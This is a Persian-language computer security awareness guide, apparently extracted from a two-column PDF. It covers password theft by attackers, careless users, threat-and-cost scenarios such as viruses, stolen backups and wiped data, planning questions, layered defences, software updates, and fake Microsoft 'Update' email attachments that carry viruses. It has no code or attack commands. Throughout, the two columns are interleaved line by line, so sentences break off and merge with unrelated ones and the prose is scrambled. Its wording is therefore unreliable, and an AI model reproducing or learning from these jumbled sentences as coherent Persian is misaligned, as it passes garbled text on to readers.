ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻳﺎ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﻣـﻲﻛﻨﻴـﺪ ﺑﺘﻮﺍﻧـﺪ ﻧـﺎﻡ ﺧﻼﻗﻴﺖ ﺗﺒﻬﻜﺎﺭﺍﻥ -ﺍﻧﺴﺎﻥ ﻣﻮﺟﻮﺩ ﺧﻼﻗﻲ ﺍﺳﺖ ﻭ ﺍﻓﺮﺍﺩ •
ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ. ﺑﺎﺍﻧﮕﻴﺰﻩ ﻫﻤﻴﺸﻪ ﺑﺮﺍﻱ ﻏﻠﺒﻪ ﺑﺮ ﻣﻮﺍﻧـﻊ ﺍﻣﻨﻴﺘـﻲ ﻭ ﻛـﺸﻒ
...ﻫﻨﮕﺎﻣﻴﻜﻪ ﺭﻭﻱ ﻳﻚ ﭘﺮﻭﮊﺓ ﻣﻬﻢ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﻭ ﺯﻣـﺎﻥ ﺩﺭ ﺁﻥ ﺍﺷﺘﺒﺎﻫﺎﺗﻲ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﺷﻮﻧﺪ ﺭﺍﻫﻲ ﭘﻴـﺪﺍ
ﻧﻘﺶ ﺑﺴﻴﺎﺭ ﻣﻬﻤﻲ ﺩﺍﺭﺩ ،ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﮔﺮﺩﺩ. ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ.
...ﻳﻚ ﻭﻳﺮﻭﺱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺨﺮﺏ ﺑﻪ ﻫﻤﻪ ﺩﻭﺳﺘﺎﻧﺘﺎﻥ ﻛﻪ ﻧﺎﻡ ﺁﻧﻬﺎ ﺳﻄﺢ ﭘﺎﻳﻴﻦ ﺁﮔﺎﻫﻲ ﻛﺎﺭﺑﺮﺍﻥ -ﻛﺎﺭﺑﺮﺍﻥ ﻣﻌﻤﻮﻟﻲ )ﻗﺮﺑﺎﻧﻴﺎﻥ •
ﺩﺭ ﺩﻓﺘﺮﭼﺔ ﺁﺩﺭﺳﻬﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺛﺒﺖ ﺷﺪﻩ ﺍﺭﺳﺎﻝ ﺷﻮﺩ. ﺗﺨﻠﻔﺎﺕ ﺍﻣﻨﻴﺘﻲ( ﺑﻄﻮﺭ ﻃﺒﻴﻌﻲ ﺍﺯ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺍﻃـﺮﺍﻑ ﺧـﻮﺩ
ﺁﮔﺎﻫﻲ ﻧﺪﺍﺭﻧﺪ ﻭ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﭘﻲ ﺭﺍﻫﻬﺎﻱ ﻣﻨﺎﺳـﺐ
...ﻭﻗﺘﻲ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺗﻠﻔﻦ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻳﺪ ﻣﻼﺣﻈﻪ ﻛﻨﻴﺪ ﻛـﻪ
ﺟﻬﺖ ﺗﻀﻤﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺍﺩﻩﻫﺎ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﻮﺩ ﻧﻴﺴﺘﻨﺪ.
ﻣﺒﻠﻎ ﺁﻥ ﺣﺘﻲ ﺍﺯ ﺣﻘﻮﻕ ﻣﺎﻫﻴﺎﻧﺔ ﺷﻤﺎ ﻫﻢ ﺑﻴﺸﺘﺮ ﺍﺳﺖ ﻭ ﺍﻳـﻦ ﺩﺭ
ﺷﺮﺍﻳﻄﻲ ﺍﺳﺖ ﻛﻪ ﻣﻄﻤـﺌﻦ ﻫـﺴﺘﻴﺪ ﺑـﻪ ﺍﻳـﻦ ﻣﻴـﺰﺍﻥ ﺍﺯ ﺗﻠﻔـﻦ ﻧﮕﺎﻩ ﻏﻴﺮﻭﺍﻗﻌﻲ ﻗﺮﺑﺎﻧﻴﺎﻥ -ﺑﺮﺧـﻲ ﻛـﺎﺭﺑﺮﺍﻥ ﻧـﺴﺒﺖ ﺑـﻪ •
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﺮﺩﻩﺍﻳﺪ. ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧﺪ ﻭﻟﻲ ﺁﻧﻬﺎ ﺭﺍ ﺟﺪﻱ ﻧﻤﻲﮔﻴﺮﻧﺪ؛
ﭼﻮﻥ ﮔﻤﺎﻥ ﻣﻲﻛﻨﻨﺪ ﻛـﻪ ﺣﻤﻠـﻪﺍﻱ ﻋﻠﻴـﻪ ﺁﻧﻬـﺎ ﺻـﻮﺭﺕ
...ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺮﺍﻱ ﺷـﻤﺎ ﺍﺭﺳـﺎﻝ ﺷـﻮﺩ ﻭ
ﻧﺨﻮﺍﻫﺪ ﮔﺮﻓﺖ.
ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ ﻛﻪ ﺍﻳﻦ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺷـﻤﺎ ﻧﻴـﺴﺖ؛ ﻭﻟـﻲ ﺑﺎﻧـﻚ
ﺳﻌﻲ ﺩﺍﺭﺩ ﺷﻤﺎ ﺭﺍ ﻣﺘﻘﺎﻋﺪ ﻛﻨﺪ ﻛﻪ ﺑﻪ ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺯ ﻛـﺎﺭﺕ ﺧـﻮﺩ
ﺍﺭﺯﻳﺎﺑﻲ ﺗﻬﺪﻳﺪﺍﺕ ﻭ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺁﻧﻬﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩﻩﺍﻳﺪ ﻭ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺪﻋﺎ ﺩﻟﻴﻞ ﻫﻢ ﺩﺍﺭﺩ.
ﺟﻬﺖ ﺩﺭﻙ ﺍﻫﻤﻴﺖ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺍﺳـﺖ ﺑـﻪ ﭼﻨـﺪ ﺳـﺆﺍﻝ
ﺳﺆﺍﻻﺕ ﻛﻠﻴﺪﻱ ﻛﻪ ﺩﺭ ﻫﺮ ﻣﻮﺭﺩ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﺷﻮﺩ ﺑﻪ
ﭘﺎﺳﺦ ﺩﺍﺩﻩ ﺷﻮﺩ .ﺍﺑﺘﺪﺍ ﻓﺮﺽ ﻛﻨﻴـﺪ ﻣـﺴﺎﺋﻞ ﺯﻳـﺮ ﺍﺗﻔـﺎﻕ ﺍﻓﺘـﺎﺩﻩ
ﺷﺮﺡ ﺯﻳﺮ ﻫﺴﺘﻨﺪ:
ﺑﺎﺷﻨﺪ ﻭ ﺳﭙﺲ ﺳﻌﻲ ﻛﻨﻴﺪ ﻧﺘـﺎﻳﺞ ﺍﺣﺘﻤـﺎﻟﻲ ﻫﺮﻳـﻚ ﺭﺍ ﺍﺭﺯﻳـﺎﺑﻲ
ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ،ﺁﻳﺎ ﺍﻣﻜﺎﻥ ﺗﺮﻣﻴﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؟ • ﻧﻤﺎﻳﻴﺪ ﻭ ﺩﺭ ﻫﺮ ﻣﻮﺭﺩ ﺑـﻪ ﭼﻨـﺪ ﺳـﺆﺍﻝ ﻛﻠﻴـﺪﻱ ﻛـﻪ ﺩﺭ ﺍﺑﺘـﺪﺍﻱ
ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﭼﻘﺪﺭ ﺯﻣﺎﻥ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟ • ﺻﻔﺤﻪ ﺑﻌﺪﻱ ﺁﻣﺪﻩ ﭘﺎﺳﺦ ﺩﻫﻴﺪ.
ﭼﻪ ﻣﻘﺪﺍﺭ ﻫﺰﻳﻨﻪ ﺻﺮﻑ ﺁﻥ ﻣﻲﺷﻮﺩ؟ •
ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﺧﻮﺍﻫﺪ ﺍﻓﺘﺎﺩ ﺍﮔﺮ...
ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺭﺍ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻗﺮﺍﺭ ﺩﻫﺪ؟ •
ﭼﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺟﺎﻧﺒﻲ ﺩﺭ ﺑﺮ ﺩﺍﺭﺩ؟ )ﻣﺜ ﹰ
ﻼ ﺩﺭ ﺷﺮﺍﻳﻂ ﻧﺎﻣﻨﺎﺳﺐ • ...ﺷﺨﺼﻲ ﺑﻪ ﺧﺎﻧﻪ ﻭ ﻳﺎ ﻣﺤﻞ ﻛﺎﺭ ﺷﻤﺎ ﺣﻤﻠﻪ ﻛﻨﺪ ﻭ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ
ﻭ ﺩﺭ ﻏﻴﺎﺏ ﻣﺴﺌﻮﻝ ﻣﺮﺑﻮﻃﻪ( ﺭﺍ ﺑﺪﺯﺩﺩ ﻭ ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺩﻳﺴﻚ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﻛﻪ ﻣﻤﻜﻦ
ﺍﺳﺖ ﺩﺭ ﺁﻥ ﻧﺰﺩﻳﻜﻲ ﺑﺎﺷﺪ ﺭﺍ ﻧﻴﺰ ﺑﺎ ﺧﻮﺩ ﺑﺒﺮﺩ.
ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺍﻫﻤﻴﺖ ﻣﻮﺿﻮﻉ "ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ" ﺭﺍ ﻣـﺸﺨﺺ
ﻣﻲﻛﻨﻨﺪ .ﺍﻛﻨﻮﻥ ﻛﻪ ﻣﺘﻮﺟﻪ ﺷﺪﻩﺍﻳﺪ ﺍﻣﻨﻴﺖ ﻣﻮﺿﻮﻋﻲ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ...ﻫﻤﺔ ﺩﺍﺩﻩﻫﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﭘﺎﻙ ﺷﻮﻧﺪ.
ﺍﺳﺖ ،ﮔﺎﻡ ﺑﻌﺪﻱ ﺑﺮﺭﺳﻲ ﻳﻚ ﻃﺮﺡ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﺑﺮﺍﻱ ﺍﻳﻤـﻦ ...ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺷﻤﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻭﺩ .ﺍﻳﻦ ﺩﺍﺩﻩﻫـﺎ
ﺷﺪﻥ ﻣﻲﺑﺎﺷﺪ: ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩﻱ ﺑﺎﺷﻨﺪ ﺍﺯ ﻗﺒﻴﻞ :ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺏ
ﺑﺎﻧﻜﻲ ،ﻓﻬﺮﺳﺖ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮ ﹺﺭ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ
ﻓﺮﺳﺘﺎﺩﻩ ﺑﺎﺷﺪ ،ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ ﺑـﺎﺯﻛﺮﺩﻥ ﻭ ﻳـﺎ ﺑـﺎﺯ ﻧﻜـﺮﺩﻥ ﺁﻥ ﺍﻳﻤﻦ ﺷﺪﻥ ﺑﺮﺍﻱ ﺷﻤﺎ ﭼﻪ ﻫﺰﻳﻨﻪﺍﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؟ •
ﺗﺼﻤﻴﻢ ﮔﻴﺮﻱ ﻛﻨﻴﺪ .ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺣﺘﻴﺎﻁ ﺩﺭ ﺯﻧﺪﮔﻲ ﺭﻭﺯﻣـﺮﻩ ﻧﻴـﺰ ﭼﻪ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟ •
ﺿﺮﻭﺭﻱ ﺍﺳﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺑﺴﻴﺎﺭ ﺧﻮﺷـﺎﻳﻨﺪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﺍﮔـﺮ ﺗﺎ ﭼﻪ ﺣﺪ ﻣﺸﻜﻞﺁﻓﺮﻳﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ؟ •
ﺑﺘﻮﺍﻧﻴﺪ ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺯ ﺧﻴﺎﺑﺎﻥ ﻋﺒـﻮﺭ ﻛﻨﻴـﺪ؛ ﺍﻣـﺎ ﻻﺯﻡ ﺁﻳﺎ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛـﻪ ﺑـﺎ ﺍﺟـﺮﺍﻱ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ، •
ﺍﺳﺖ ﺑﺮﺍﻱ ﻋﺒﻮﺭ ﺍﺯ ﺧﻴﺎﺑﺎﻥ ﻣﺮﺍﻗﺐ ﺁﻣﺪ ﻭ ﺭﻓﺖ ﻣﺎﺷﻴﻨﻬﺎ ﺑﺎﺷﻴﺪ. ﺍﻧﺠﺎﻡ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﻭ ﻳﺎ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ؟
ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺗﻨﻬـﺎﻳﻲ ﻃـﺮﺡ ﺭﺍ ﺍﺟـﺮﺍ ﻛﻨﻴـﺪ ﻳـﺎ ﺑـﺮﺍﻱ •
ﺁﻳﺎ ﻛﺎﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘـﻲ، ﺍﺟﺮﺍﻱ ﺁﻥ ﺑﻪ ﻛﻤﻚ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ؟
ﺍﻧﺠﺎﻡ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﻭ ﻳﺎ ﻏﻴﺮ ﻣﻤﻜﻦ ﺷﻮﺩ؟
ﺑﺨﺶ ﺩﻭﻡ
ﺁﻳﺎ ﻣﻲ ﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻃﺮﺡ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﻳﺎ ﺑـﺮﺍﻱ ﭼﻪ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ؟
ﺍﺟﺮﺍﻱ ﺁﻥ ﺑﻪ ﻛﻤﻚ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ؟
ﻣﺴﻠﻤﹰﺎ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻭ ﺩﻧﺒﺎﻝ ﻛﺮﺩﻥ ﺁﻥ ﺯﻣﺎﻧﻲ ﺭﺍ ﺑﻪ ﺧـﻮﺩ
ﻓﺮﺽ ﺑﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﻣﺴﺌﻮﻝ ﺗﻤﺎﻡ ﺍﺑﻌﺎﺩ ﺍﻣﻨﻴﺘﻲ ﺳﻴـﺴﺘﻢ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ ،ﺍﻣﺎ ﻣﻴﺰﺍﻥ ﺍﻳﻦ ﺯﻣـﺎﻥ ﺯﻳـﺎﺩ ﻧﻴـﺴﺖ .ﺩﺭ ﺍﻳـﻦ
ﺧﻮﺩ ﻫﺴﺘﻴﺪ ،ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺷﺎﻳﺪ ﺑﻬﺘﺮ ﺑﺎﺷﺪ ﻛﻪ ﺑﺮﺍﻱ ﺑﻬﺘﺮ ﺍﻧﺠـﺎﻡ ﺧﺼﻮﺹ ﻻﺯﻡ ﺍﺳﺖ ﻛﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻨﺎﺳﺐ ﺭﺍ ﻧﺼﺐ ﻛﻨﻴـﺪ ﻭ
ﺷﺪﻥ ﻛﺎﺭ ﺍﺯ ﺩﻳﮕﺮﺍﻥ ﻧﻴﺰ ﻛﻤﻚ ﺑﮕﻴﺮﻳﺪ. ﺳﭙﺲ ﻭﻇﺎﻳﻒ ﺣﻔﺎﻇﺘﻲ ﻣﻌﻤﻮﻝ ﺭﺍ ﻃﺒﻖ ﻳﻚ ﺭﻭﺍﻝ ﻣﺸﺨﺺ ﺑﻪ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﻭﺻـﻠﻪﻫـﺎﻱ ٧ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻛـﻪ • ﺍﻧﺠﺎﻡ ﺭﺳﺎﻧﻴﺪ.
ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﻓﺮﺁﻳﻨﺪ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴـﺖ ﺍﺳـﺖ ﺑـﻪ ﭘﻬﻨـﺎﻱ
ﺗﺎ ﭼﻪ ﺣﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺸﻜﻞ ﺁﻓﺮﻳﻦ ﺧﻮﺍﻫﺪ ﺑﻮﺩ؟
ﺑﺎﻧﺪ ٨ﺷﻤﺎ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ .ﻣﺴﻠﻤﹰﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑـﺮﺍﻱ ﻛـﺴﻲ
ﻛﻪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﺪﻩ ﻭ ﺳﺮﻋﺖ ﺍﺭﺗﺒﺎﻁ ﻭﻱ ﺩﺭ ﺣﺪ ﻣﻴﺰﺍﻥ ﻣﺸﻜﻼﺕ ﺑﻪ ﺩﻳﺪﮔﺎﻩ ﺷـﻤﺎ ﺑـﺴﺘﮕﻲ ﺩﺍﺭﺩ .ﺑﺎﻳـﺪ ﺩﺭ ﻣـﻮﺭﺩ
ﻣﮕﺎﺑﺎﻳﺖ ﺍﺳﺖ ﻣﺸﻜﻠﺴﺎﺯ ﻧﻴـﺴﺖ؛ ﻭﻟـﻲ ﭘﻬﻨـﺎﻱ ﺑﺎﻧـﺪ ﺩﺭ ﺁﻧﭽﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﺪ ﺁﮔﺎﻫﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻫﺮﮔـﺰ ﻧﺒﺎﻳـﺪ ﻓﻜـﺮ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﻪ ﺷﺪﺕ ﻣﺤـﺪﻭﺩ ﻭ ﺑـﺴﻴﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﻫﺮ ﭼﻴﺰﻱ ﺩﺭ ﻧﻮﻉ ﺧﻮﺩ ﻭﺍﺟﺪ ﺍﻣﻨﻴﺖ ﺍﺳﺖ .ﺑﺮﺍﻱ ﻣﺜـﺎﻝ
ﺍﻭﻗﺎﺕ ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﮔﺮﺍﻧﻘﻴﻤﺖ ﺍﺳﺖ ﻭ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﮔﺮ ﺷﺨﺼﻲ ﺩﺭ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺑـﺮﺍﻱ ﺷـﻤﺎ ﺿـﻤﻴﻤﻪﺍﻱ
ﺩﺭﺩﺳﺮﻫﺎﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠـﻪ ﺑﺮﺳـﻴﺪ ﻛـﻪ ﺍﺯ ﻃﺮﻳﻖ ﺗﻠﻔﻦ ﺑﺮﺍﻱ ﺑﺎﺯﻩﻫﺎﻱ ﻃﻮﻻﻧﻲﻣﺪﺕ ﻫﻢ ﻣﻘـﺮﻭﻥ
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺑﻌﻀﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺣـﺪﺍﻗﻞ ﺩﺭ ﺯﻣـﺎﻥ ﺣﺎﺿـﺮ ﺿـﺮﻭﺭﻱ ﺑﻪ ﺻﺮﻓﻪ ﻧﻴﺴﺖ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﺑﻬﺘﺮ
ﻧﻴﺴﺖ .ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺧﺎﺻﻲ ﺗﻜﻴﻪ ﺍﺳﺖ ﻳﻜﻨﻔﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﻌﻤﻮﻝ ﺭﺍ ﺑﻪﺭﻭﺯ ﺭﺳﺎﻧﻲ ﻛـﺮﺩﻩ
ﻣﻲﻛﻨﺪ ﺍﻣـﺎ ﻛﻤﺎﻛـﺎﻥ ﺑﺎﻳـﺪ ﻓﺮﺁﻳﻨـﺪ ﻫـﺎ ،ﻗـﻮﺍﻧﻴﻦ ،ﻭ ﻣﻼﺣﻈـﺎﺕ ﻭ ﻧــﺴﺨﻪﻫــﺎﻱ downloadﺷــﺪﺓ ﺁﻧﻬــﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴــﺎﺭ
ﺷﺨﺼﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ. ﻻ
ﺩﻳﮕــﺮﺍﻥ ﻗــﺮﺍﺭ ﺩﻫــﺪ .ﻣﺘﺄﺳــﻔﺎﻧﻪ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﻣﻌﻤــﻮ ﹰ
ﻣﺸﻜﻠﺘﺮ ﺍﺯ downloadﻛـﺮﺩﻥ ﻣـﺴﺘﻘﻴﻢ ﺗﻮﺳـﻂ ﻫـﺮ
ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ ﺍﺯ ﻻﻳﻪﻫﺎﻱ ﭼﻨﺪﮔﺎﻧﻪ ﺗﺸﻜﻴﻞ ﺷـﺪﻩ ﻭ
ﻛﺎﺭﺑﺮ ﺍﺳﺖ؛
ﻫﺮ ﻻﻳﻪ ﺍﻧﻮﺍﻉ ﺧﺎﺻﻲ ﺍﺯ ﺧﻄﺮﺍﺕ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﻣﻲﺑـﺮﺩ .ﭼﻨﺎﻧﭽـﻪ ﺍﺯ
ﻻﻳــﻪﻫــﺎﻱ ﻣﺨﺘﻠــﻒ ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻴــﺪ ﻣــﺴﻠﻤﹰﺎ ﺩﺭ ﭘﻴــﺸﮕﻴﺮﻱ ﺍﺯ ﻫﺸﺪﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺍﻓﺮﺍﺩ ﺣﺮﻓﻪ ﺍﻱ ﺩﺭ ﻛـﺎﺭ ﺑـﺎ ﺭﺍﻳﺎﻧـﻪ •
ﻣﺸﻜﻼﺕ ﺑﻴﺸﺘﺮﻱ ﻣﻮﻓﻖ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ .ﻋﻤﻞ ﺭﺍﻧﻨﺪﮔﻲ ﺭﺍ ﺩﺭﻧﻈـﺮ ﻻ ﻧﺴﺒﺖ ﺑﻪ ﭼﻨـﻴﻦ ﻛﻤﻚ ﻣﻲﻛﻨﺪ .ﻛﺎﺭﺑﺮﺍﻥ ﻣﺒﺘﺪﻱ ﻣﻌﻤﻮ ﹰ
ﺑﻴﺎﻭﺭﻳﺪ .ﺑﻨﻈﺮ ﺷﻤﺎ ﭼﻪ ﺗﺪﺍﺑﻴﺮﻱ ﻣﻲﺗﻮﺍﻥ ﺍﻧﺪﻳـﺸﻴﺪ ﻛـﻪ ﺍﺣﺘﻤـﺎﻝ ﻫﺸﺪﺍﺭﻫﺎﻳﻲ ﺣﺴﺎﺳﻴﺖ ﺯﻳﺎﺩﻱ ﻧﺪﺍﺭﻧﺪ ﻭ ﺍﮔﺮ ﻳـﻚ ﻛـﺎﺭﺑﺮ
ﻭﻗﻮﻉ ﺗﺼﺎﺩﻑ ﻛﺎﻫﺶ ﻳﺎﺑﺪ؟ ﻻ ﻗﺎﺩﺭ ﺑﻪ ﻓﻬﻢ ﻛﺎﻣـﻞ ﺁﻥ ﻭ ﻫﺸﺪﺍﺭﻱ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﻣﻌﻤﻮ ﹰ
٩
ﻣﺘﻌﺎﻗﺒﹰﺎ ﺑﺮﻭﺯ ﻭﺍﻛﻨﺶ ﻣﻨﺎﺳﺐ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ .ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ
ﺑﻌﻀﻲ ﺍﺯ ﻣﻼﺣﻈﺎﺕ ﻣﻨﺎﺳﺐ ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩﺍﻧﺪ:
ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﻳﻚ ﻫﺮﺯﻧﺎﻣﻪ ﻣـﺸﻜﻞﺁﻓـﺮﻳﻦ ﺩﺭﻳﺎﻓـﺖ
ﭼﻨﺎﻧﭽﻪ ﻣﺎﺷﻴﻦ ﻧﻴﺎﺯ ﺑﻪ ﺗﻌﻤﻴﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺑﺎﻳﺪ ﺑﻪ ﺩﺭﺳﺘﻲ • ﻛﻨﻴﺪ ﻛﻪ ﺍﺩﻋﺎ ﺩﺍﺭﺩ ﻳﻚ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺍﺯ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ
ﺗﻌﻤﻴﺮ ﺷﻮﺩ. ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﺷﺎﻣﻞ ﺿﻤﻴﻤﺔ " "Updateﺍﺳﺖ ﻭﻟﻲ ﺑﺎﻳـﺪ
ﺭﺍﻧﻨﺪﮔﻲ ﺑﺎﻳﺪ ﺑﺎ ﺩﻗﺖ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ. • ﻻ ﺿﻤﻴﻤﻪﻫﺎﻱ ﺍﻳﻦ ﻧﺎﻣـﻪﻫـﺎ ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﭼﻴﺰﻱ ﺟﺰ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺧﻄﺮﻧﺎﻙ ﻧﻴﺴﺘﻨﺪ؛ ﻭ
